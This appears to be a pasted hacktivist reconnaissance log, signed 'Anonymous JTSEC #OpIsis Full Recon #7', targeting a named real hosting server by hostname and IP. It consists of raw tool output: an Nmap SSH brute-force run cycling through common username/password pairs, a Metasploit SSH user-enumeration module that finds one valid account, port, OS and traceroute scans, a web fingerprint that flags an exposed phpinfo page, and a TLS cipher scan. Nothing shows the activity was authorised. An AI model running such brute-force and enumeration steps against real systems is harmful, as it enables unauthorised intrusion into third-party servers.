- NSE: [ssh-brute] Trying username/password pair: root:secret
- NSE: [ssh-brute] Trying username/password pair: admin:secret
- NSE: [ssh-brute] Trying username/password pair: administrator:secret
- NSE: [ssh-brute] Trying username/password pair: webadmin:secret
- NSE: [ssh-brute] Trying username/password pair: sysadmin:secret
- NSE: [ssh-brute] Trying username/password pair: netadmin:secret
- NSE: [ssh-brute] Trying username/password pair: guest:secret
- NSE: [ssh-brute] Trying username/password pair: user:secret
- NSE: [ssh-brute] Trying username/password pair: web:secret
- NSE: [ssh-brute] Trying username/password pair: test:secret
- NSE: [ssh-brute] Trying username/password pair: root:andrea
- NSE: [ssh-brute] Trying username/password pair: admin:andrea
- NSE: [ssh-brute] Trying username/password pair: administrator:andrea
- NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
- NSE: [ssh-brute] Trying username/password pair: guest:andrea
- NSE: [ssh-brute] Trying username/password pair: user:andrea
- NSE: [ssh-brute] Trying username/password pair: web:andrea
- NSE: [ssh-brute] Trying username/password pair: test:andrea
- NSE: [ssh-brute] Trying username/password pair: root:jennifer
- NSE: [ssh-brute] Trying username/password pair: admin:jennifer
- NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
- NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
- NSE: [ssh-brute] Trying username/password pair: guest:jennifer
- NSE: [ssh-brute] Trying username/password pair: user:jennifer
- NSE: [ssh-brute] Trying username/password pair: web:jennifer
- NSE: [ssh-brute] Trying username/password pair: test:jennifer
- NSE: [ssh-brute] Trying username/password pair: root:joshua
- NSE: [ssh-brute] Trying username/password pair: admin:joshua
- NSE: [ssh-brute] Trying username/password pair: administrator:joshua
- NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
- NSE: [ssh-brute] Trying username/password pair: guest:joshua
- NSE: [ssh-brute] Trying username/password pair: user:joshua
- NSE: [ssh-brute] Trying username/password pair: web:joshua
- NSE: [ssh-brute] Trying username/password pair: test:joshua
- NSE: [ssh-brute] Trying username/password pair: root:carlos
- NSE: [ssh-brute] Trying username/password pair: admin:carlos
- NSE: [ssh-brute] Trying username/password pair: administrator:carlos
- NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
- NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
- NSE: [ssh-brute] Trying username/password pair: netadmin:carlos
- NSE: [ssh-brute] Trying username/password pair: guest:carlos
- NSE: [ssh-brute] Trying username/password pair: user:carlos
- NSE: [ssh-brute] Trying username/password pair: web:carlos
- NSE: [ssh-brute] Trying username/password pair: test:carlos
- NSE: [ssh-brute] Trying username/password pair: root:superman
- NSE: [ssh-brute] Trying username/password pair: admin:superman
- NSE: [ssh-brute] Trying username/password pair: administrator:superman
- NSE: [ssh-brute] Trying username/password pair: webadmin:superman
- NSE: [ssh-brute] Trying username/password pair: sysadmin:superman
- NSE: [ssh-brute] Trying username/password pair: netadmin:superman
- NSE: [ssh-brute] Trying username/password pair: guest:superman
- NSE: [ssh-brute] Trying username/password pair: user:superman
- NSE: [ssh-brute] Trying username/password pair: web:superman
- NSE: [ssh-brute] Trying username/password pair: test:superman
- NSE: [ssh-brute] Trying username/password pair: root:bubbles
- NSE: [ssh-brute] Trying username/password pair: admin:bubbles
- NSE: [ssh-brute] Trying username/password pair: administrator:bubbles
- NSE: [ssh-brute] Trying username/password pair: webadmin:bubbles
- NSE: [ssh-brute] Trying username/password pair: sysadmin:bubbles
- NSE: [ssh-brute] Trying username/password pair: netadmin:bubbles
- NSE: [ssh-brute] Trying username/password pair: guest:bubbles
- NSE: [ssh-brute] Trying username/password pair: user:bubbles
- NSE: [ssh-brute] Trying username/password pair: web:bubbles
- NSE: [ssh-brute] Trying username/password pair: test:bubbles
- NSE: [ssh-brute] Trying username/password pair: root:hannah
- NSE: [ssh-brute] Trying username/password pair: admin:hannah
- NSE: [ssh-brute] Trying username/password pair: administrator:hannah
- NSE: [ssh-brute] Trying username/password pair: webadmin:hannah
- NSE: [ssh-brute] Trying username/password pair: sysadmin:hannah
- NSE: [ssh-brute] Trying username/password pair: netadmin:hannah
- NSE: [ssh-brute] Trying username/password pair: guest:hannah
- NSE: [ssh-brute] Trying username/password pair: user:hannah
- NSE: [ssh-brute] Trying username/password pair: web:hannah
- NSE: [ssh-brute] Trying username/password pair: test:hannah
- NSE: [ssh-brute] Trying username/password pair: root:1234567890
- NSE: [ssh-brute] Trying username/password pair: admin:1234567890
- NSE: [ssh-brute] Trying username/password pair: administrator:1234567890
- NSE: [ssh-brute] Trying username/password pair: webadmin:1234567890
- NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567890
- NSE: [ssh-brute] Trying username/password pair: netadmin:1234567890
- NSE: [ssh-brute] Trying username/password pair: guest:1234567890
- NSE: [ssh-brute] Trying username/password pair: user:1234567890
- NSE: [ssh-brute] Trying username/password pair: web:1234567890
- NSE: [ssh-brute] Trying username/password pair: test:1234567890
- NSE: [ssh-brute] Trying username/password pair: root:amanda
- NSE: [ssh-brute] Trying username/password pair: admin:amanda
- NSE: [ssh-brute] Trying username/password pair: administrator:amanda
- NSE: [ssh-brute] Trying username/password pair: webadmin:amanda
- NSE: [ssh-brute] Trying username/password pair: sysadmin:amanda
- NSE: [ssh-brute] Trying username/password pair: netadmin:amanda
- NSE: [ssh-brute] Trying username/password pair: guest:amanda
- NSE: [ssh-brute] Trying username/password pair: user:amanda
- NSE: [ssh-brute] Trying username/password pair: web:amanda
- NSE: [ssh-brute] Trying username/password pair: test:amanda
- NSE: [ssh-brute] Trying username/password pair: root:andrew
- NSE: [ssh-brute] Trying username/password pair: admin:andrew
- NSE: [ssh-brute] Trying username/password pair: administrator:andrew
- NSE: [ssh-brute] Trying username/password pair: webadmin:andrew
- NSE: [ssh-brute] Trying username/password pair: sysadmin:andrew
- NSE: [ssh-brute] Trying username/password pair: netadmin:andrew
- NSE: [ssh-brute] Trying username/password pair: guest:andrew
- NSE: [ssh-brute] Trying username/password pair: user:andrew
- NSE: [ssh-brute] Trying username/password pair: web:andrew
- NSE: [ssh-brute] Trying username/password pair: test:andrew
- NSE: [ssh-brute] Trying username/password pair: root:loveyou
- NSE: [ssh-brute] Trying username/password pair: admin:loveyou
- NSE: [ssh-brute] Trying username/password pair: administrator:loveyou
- NSE: [ssh-brute] Trying username/password pair: webadmin:loveyou
- NSE: [ssh-brute] Trying username/password pair: sysadmin:loveyou
- NSE: [ssh-brute] Trying username/password pair: netadmin:loveyou
- NSE: [ssh-brute] Trying username/password pair: guest:loveyou
- NSE: [ssh-brute] Trying username/password pair: user:loveyou
- NSE: [ssh-brute] Trying username/password pair: web:loveyou
- NSE: [ssh-brute] Trying username/password pair: test:loveyou
- NSE: [ssh-brute] Trying username/password pair: root:pretty
- NSE: [ssh-brute] Trying username/password pair: admin:pretty
- NSE: [ssh-brute] Trying username/password pair: administrator:pretty
- NSE: [ssh-brute] Trying username/password pair: webadmin:pretty
- NSE: [ssh-brute] Trying username/password pair: sysadmin:pretty
- NSE: [ssh-brute] Trying username/password pair: netadmin:pretty
- NSE: [ssh-brute] Trying username/password pair: guest:pretty
- NSE: [ssh-brute] Trying username/password pair: user:pretty
- NSE: [ssh-brute] Trying username/password pair: web:pretty
- NSE: [ssh-brute] Trying username/password pair: test:pretty
- NSE: [ssh-brute] Trying username/password pair: root:basketball
- NSE: [ssh-brute] Trying username/password pair: admin:basketball
- NSE: [ssh-brute] Trying username/password pair: administrator:basketball
- NSE: [ssh-brute] Trying username/password pair: webadmin:basketball
- NSE: [ssh-brute] Trying username/password pair: sysadmin:basketball
- NSE: [ssh-brute] Trying username/password pair: netadmin:basketball
- NSE: [ssh-brute] Trying username/password pair: guest:basketball
- NSE: [ssh-brute] Trying username/password pair: user:basketball
- NSE: [ssh-brute] Trying username/password pair: web:basketball
- NSE: [ssh-brute] Trying username/password pair: test:basketball
- NSE: [ssh-brute] Trying username/password pair: root:angels
- NSE: [ssh-brute] Trying username/password pair: admin:angels
- NSE: [ssh-brute] Trying username/password pair: administrator:angels
- NSE: [ssh-brute] Trying username/password pair: webadmin:angels
- NSE: [ssh-brute] Trying username/password pair: sysadmin:angels
- NSE: [ssh-brute] Trying username/password pair: netadmin:angels
- NSE: [ssh-brute] Trying username/password pair: guest:angels
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- |_ password
- | ssh-brute:
- | Accounts: No valid accounts found
- |_ Statistics: Performed 567 guesses in 182 seconds, average tps: 3.4
- | ssh-hostkey:
- | 1024 fa:d3:03:2f:db:82:8d:21:30:46:74:25:37:bb:fa:3e (DSA)
- |_ 2048 e1:2a:51:40:6c:bd:91:34:21:28:ab:59:64:59:9b:4a (RSA)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Device type: general purpose|storage-misc|firewall|VoIP phone
- Running (JUST GUESSING): Linux 2.6.X|3.X (91%), Synology DiskStation Manager 5.X (90%), WatchGuard Fireware 11.X (89%), Grandstream embedded (85%)
- OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/o:watchguard:fireware:11.8 cpe:/h:grandstream:gxv3275
- Aggressive OS guesses: Linux 2.6.32 (91%), Linux 3.10 (91%), Linux 3.4 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 or 3.10 (89%), Linux 2.6.39 (89%), WatchGuard Fireware 11.8 (89%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 19 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 22.70 ms 10.246.200.1
- 2 22.74 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 33.16 ms 37.120.128.166
- 4 22.74 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 56.57 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
- 6 120.27 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
- 7 115.04 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
- 8 114.42 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
- 9 116.26 ms 80.231.131.157
- 10 120.03 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
- 11 114.45 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
- 12 119.20 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
- 13 114.44 ms 195.219.87.9
- 14 113.26 ms 195.219.87.25
- 15 129.85 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 16 130.54 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 17 131.10 ms 212.237.248.7
- 18 ...
- 19 130.82 ms linux260.unoeuro.com (93.191.156.145)
- #######################################################################################################################################
- USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
- RHOSTS => 93.191.156.145
- RHOST => 93.191.156.145
- [*] 93.191.156.145:22 - SSH - Using malformed packet technique
- [*] 93.191.156.145:22 - SSH - Starting scan
- [-] 93.191.156.145:22 - SSH - User 'admin' not found
- [-] 93.191.156.145:22 - SSH - User 'administrator' not found
- [-] 93.191.156.145:22 - SSH - User 'anonymous' not found
- [-] 93.191.156.145:22 - SSH - User 'backup' not found
- [-] 93.191.156.145:22 - SSH - User 'bee' not found
- [-] 93.191.156.145:22 - SSH - User 'ftp' not found
- [-] 93.191.156.145:22 - SSH - User 'guest' not found
- [-] 93.191.156.145:22 - SSH - User 'GUEST' not found
- [-] 93.191.156.145:22 - SSH - User 'info' not found
- [-] 93.191.156.145:22 - SSH - User 'mail' not found
- [-] 93.191.156.145:22 - SSH - User 'mailadmin' not found
- [-] 93.191.156.145:22 - SSH - User 'msfadmin' not found
- [-] 93.191.156.145:22 - SSH - User 'mysql' not found
- [-] 93.191.156.145:22 - SSH - User 'nobody' not found
- [-] 93.191.156.145:22 - SSH - User 'oracle' not found
- [-] 93.191.156.145:22 - SSH - User 'owaspbwa' not found
- [-] 93.191.156.145:22 - SSH - User 'postfix' not found
- [-] 93.191.156.145:22 - SSH - User 'postgres' not found
- [-] 93.191.156.145:22 - SSH - User 'private' not found
- [-] 93.191.156.145:22 - SSH - User 'proftpd' not found
- [-] 93.191.156.145:22 - SSH - User 'public' not found
- [-] 93.191.156.145:22 - SSH - User 'root' not found
- [-] 93.191.156.145:22 - SSH - User 'superadmin' not found
- [+] 93.191.156.145:22 - SSH - User 'support' found
- [-] 93.191.156.145:22 - SSH - User 'sys' not found
- [-] 93.191.156.145:22 - SSH - User 'system' not found
- [-] 93.191.156.145:22 - SSH - User 'systemadmin' not found
- [-] 93.191.156.145:22 - SSH - User 'systemadministrator' not found
- [-] 93.191.156.145:22 - SSH - User 'test' not found
- [-] 93.191.156.145:22 - SSH - User 'tomcat' not found
- [-] 93.191.156.145:22 - SSH - User 'user' not found
- [-] 93.191.156.145:22 - SSH - User 'webmaster' not found
- [-] 93.191.156.145:22 - SSH - User 'www-data' not found
- [-] 93.191.156.145:22 - SSH - User 'Fortimanager_Access' not found
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:54 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 21.94 ms 10.246.200.1
- 2 22.33 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 37.74 ms 37.120.128.166
- 4 21.98 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 22.00 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
- 6 113.58 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
- 7 114.21 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
- 8 113.61 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
- 9 115.99 ms 80.231.131.157
- 10 113.24 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
- 11 115.89 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
- 12 115.89 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
- 13 114.87 ms 195.219.87.9
- 14 114.84 ms 195.219.87.25
- 15 130.36 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 16 130.10 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 17 130.05 ms 212.237.248.7
- 18 129.69 ms linux260.unoeuro.com (93.191.156.145)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:56 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 23.46 ms 10.246.200.1
- 2 23.90 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 43.82 ms 37.120.128.166
- 4 23.50 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 43.28 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
- 6 115.51 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
- 7 116.10 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
- 8 114.90 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
- 9 114.90 ms 80.231.131.157
- 10 115.55 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
- 11 114.76 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
- 12 114.71 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
- 13 114.72 ms 195.219.87.9
- 14 113.62 ms 195.219.87.25
- 15 128.62 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 16 129.56 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 17 129.12 ms 212.237.248.7
- 18 131.15 ms linux260.unoeuro.com (93.191.156.145)
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 21:58 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 33.22 ms 10.246.200.1
- 2 33.81 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 52.06 ms 37.120.128.166
- 4 33.81 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 33.80 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
- 6 126.15 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
- 7 124.52 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
- 8 124.76 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
- 9 124.14 ms 80.231.131.157
- 10 126.17 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
- 11 118.07 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
- 12 118.85 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
- 13 118.61 ms 195.219.87.9
- 14 117.81 ms 195.219.87.25
- 15 130.91 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 16 134.15 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 17 133.16 ms 212.237.248.7
- 18 133.07 ms linux260.unoeuro.com (93.191.156.145)
- #######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning http://93.191.156.145...
- ___________________ SITE INFO ___________________
- IP Title
- 93.191.156.145 This server is operated by UnoEu
- ____________________ VERSION ____________________
- Name Versions Type
- Apache Platform
- PHP 7.1.26 Platform
- __________________ INTERESTING __________________
- URL Note Type
- /phpinfo.php PHP info file Interesting
- _________________________________________________
- Time: 0.8 sec Urls: 599 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 406 Not Acceptable
- Date: Wed, 30 Jan 2019 03:01:28 GMT
- Content-Type: text/html; charset=iso-8859-1
- Connection: keep-alive
- HTTP/1.1 406 Not Acceptable
- Date: Wed, 30 Jan 2019 03:01:28 GMT
- Content-Type: text/html; charset=iso-8859-1
- Connection: keep-alive
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 22:01 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.13s latency).
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 21.89 ms 10.246.200.1
- 2 22.32 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 41.11 ms 37.120.128.166
- 4 21.95 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 21.98 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
- 6 114.17 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
- 7 113.79 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
- 8 113.86 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
- 9 119.44 ms 80.231.131.157
- 10 113.90 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
- 11 114.92 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
- 12 114.48 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
- 13 114.91 ms 195.219.87.9
- 14 114.51 ms 195.219.87.25
- 15 128.96 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 16 133.34 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 17 133.27 ms 212.237.248.7
- 18 133.22 ms linux260.unoeuro.com (93.191.156.145)
- ######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-29 22:03 EST
- Nmap scan report for linux260.unoeuro.com (93.191.156.145)
- Host is up (0.035s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 18 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 22.02 ms 10.246.200.1
- 2 22.68 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
- 3 37.55 ms 37.120.128.166
- 4 22.27 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
- 5 22.32 ms ix-xe-11-1-1-0.tcore1.w6c-montreal.as6453.net (66.198.96.98)
- 6 114.06 ms if-ae-12-2.tcore1.mtt-montreal.as6453.net (64.86.31.26)
- 7 113.89 ms if-ae-0-2.tcore2.mtt-montreal.as6453.net (216.6.115.90)
- 8 114.09 ms if-ae-5-2.tcore2.n0v-new-york.as6453.net (64.86.226.58)
- 9 116.26 ms 80.231.131.157
- 10 113.55 ms if-ae-2-2.tcore1.l78-london.as6453.net (80.231.131.2)
- 11 113.51 ms if-ae-3-2.tcore1.pye-paris.as6453.net (80.231.154.142)
- 12 114.17 ms if-ae-11-2.tcore1.pvu-paris.as6453.net (80.231.153.49)
- 13 113.43 ms 195.219.87.9
- 14 113.44 ms 195.219.87.25
- 15 136.63 ms ae1-0.sdnqe10.dk.ip.tdc.net (83.88.12.247)
- 16 130.45 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
- 17 130.41 ms 212.237.248.7
- 18 129.81 ms linux260.unoeuro.com (93.191.156.145)
- #######################################################################################################################################
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 93.191.156.145
- Testing SSL server 93.191.156.145 on port 443 using SNI name 93.191.156.145
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.2 128 bits AES128-GCM-SHA256
- Accepted TLSv1.2 256 bits AES256-GCM-SHA384
- Accepted TLSv1.2 128 bits AES128-SHA256
- Accepted TLSv1.2 256 bits AES256-SHA256
- Accepted TLSv1.2 128 bits AES128-SHA
- Accepted TLSv1.2 256 bits AES256-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.1 128 bits AES128-SHA
- Accepted TLSv1.1 256 bits AES256-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
- Accepted TLSv1.0 128 bits AES128-SHA
- Accepted TLSv1.0 256 bits AES256-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: *.unoeuro.com
- Altnames: DNS:*.unoeuro.com, DNS:unoeuro.com
- Issuer: COMODO RSA Organization Validation Secure Server CA
- Not valid before: Feb 10 00:00:00 2016 GMT
- Not valid after: Feb 20 23:59:59 2019 GMT
- #######################################################################################################################################
- Anonymous JTSEC #OpIsis Full Recon #7
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement